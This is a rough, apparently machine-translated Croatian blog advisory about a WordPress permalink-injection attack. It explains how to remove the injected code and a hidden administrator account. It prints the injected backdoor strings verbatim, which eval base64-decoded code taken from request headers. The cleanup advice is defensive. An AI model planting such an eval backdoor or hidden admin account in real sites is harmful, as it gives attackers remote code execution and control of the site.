Nedavni SQL napad pogodio je mnoga mjesta na koja se na vašu web lokaciju ubrizgava kôd. Ova MySQL injekcija utječe na vaše trajne veze što ih čini neučinkovitima. Kao rezultat toga, URL vaših blogova neće raditi. U ovom napadu napadnuti su brojni blogovi WordPress, zahvaljujući Andyju Sowardu što nam je privukao pažnju.
Bio je jedan od sljedećih kodova koji je dodan u vašu strukturu stalne veze zbog ovog napada:
% & ({$ {eval (base64_decode ($ _ SERVER (HTTP_REFERER)))}} |. +) &%
„/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%
Ovi navodnici uključuju sve trajne veze na vašoj web lokaciji i mogu se mijenjati samo ako se ručno uklone.
Da biste to riješili, idite na:
Postavke> Permalinkks i brišite gornji kôd i zamijenite zadani kôd.
Sljedeće što treba učiniti je otići na Korisnici. Vidjet ćete da postoji više administratora. Nećete vidjeti svoje ime na popisu, ali vidjet ćete porast broja. Dakle, ono što biste trebali učiniti je pogledati sve korisnike i pronaći zadnjeg koji se registrirao. Zadržite pokazivač iznad tog korisnika i potražite vezu. Promijenite korisničkiid = kod dodavanjem 1 na taj broj. Dakle, ako je posljednji korisnik kojeg možete vidjeti bio user # 2dodati 1 i učini to 3, Trebali biste ustanoviti da skriveni administrator ima čudan kod kao prvo ime. Izbrišite kôd i učinite ga pretplatnikom. Zatim se vratite i izbrišite.
To bi trebalo riješiti problem. Možete ga i ukloniti tako da jednostavno otvorite svoj PHPMyAdmin. Jer ćete tamo vidjeti korisnika.
Željeli smo što prije iznijeti ove vijesti kako bi se naši korisnici mogli ažurirati. Obavezno provjerite nije li vaš blog zaražen. Nadamo se da će WordPress uskoro izaći s izdanjem.
Također, ako niste implementirali neke od ovih mjera za zaštitu vašeg WordPress područja administracije.
